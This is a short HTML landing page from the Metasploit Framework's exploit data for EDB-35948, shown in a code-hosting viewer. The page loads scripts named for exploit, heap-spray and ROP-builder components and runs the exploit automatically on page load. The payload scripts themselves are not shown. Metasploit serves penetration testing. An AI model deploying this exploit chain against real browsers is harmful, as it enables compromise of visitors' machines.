metasploit-framework/data/exploits/edb-35948/main.html

11 lines
270 B
HTML
Raw Normal View History

2015-02-06 17:04:59 +00:00
<!DOCTYPE html>
<html>
<head>
<script src="js/exploit.js"></script>
<script src="js/sprayer.js"></script>
<script src="js/informer.js"></script>
<script src="js/rop_builder.js"></script>
</head>
<body onload="e = new Exploit(); e.run();">
</body>
</html>